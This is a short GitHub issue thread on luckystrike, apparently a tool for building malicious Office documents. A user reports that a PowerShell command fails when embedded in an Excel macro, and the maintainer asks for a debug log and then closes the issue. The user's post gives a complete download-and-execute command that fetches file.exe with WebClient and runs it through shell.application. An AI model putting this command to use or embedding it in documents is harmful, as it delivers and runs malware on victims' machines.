### ISSUE TITLE
Shell command wont execute in excel file but it works when run in powershell

### ISSUE THREAD

**Issue by sandorkolar** [curi0usJack/luckystrike#42]
When I test command in powershell, it works flawlessly, but when I try to create macro or metadata with it , it doesn't work . Command I use is:

$down = New-Object System.Net.WebClient; $url = 'domain\path\file'; $file = 'file.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;

**Comment by curi0usJack** [comment]
Sorry for the delay in my response. You need to run luckystrike with the -Debug switch parameter then post the debug log file here so I can analyze.

**Comment by curi0usJack** [comment]
Closed. No response from OP.
